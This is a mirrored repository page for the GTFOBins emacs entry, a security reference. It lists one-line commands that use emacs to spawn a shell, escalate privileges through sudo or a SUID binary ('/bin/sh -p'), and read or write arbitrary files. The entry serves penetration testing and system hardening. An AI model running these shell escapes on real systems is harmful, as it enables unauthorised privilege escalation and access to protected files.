This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-14 03:11:33 +01:00
Code
Issues
1b5f2aedae
GTFOBins.github.io
/
_gtfobins
/
emacs.md
Andrea Cardaci
004b4bf828
Fix trailing spaces
2018-05-28 20:12:44 +02:00
363 B
Raw
Blame
History
functions
execute-interactive
sudo-enabled
suid-enabled
file-read
file-write
code
emacs -Q -nw --eval '(term "/bin/sh")'
code
sudo emacs -Q -nw --eval '(term "/bin/sh")'
code
./emacs -Q -nw --eval '(term "/bin/sh -p")'
code
emacs file_to_read
code
emacs file_to_write C-x C-s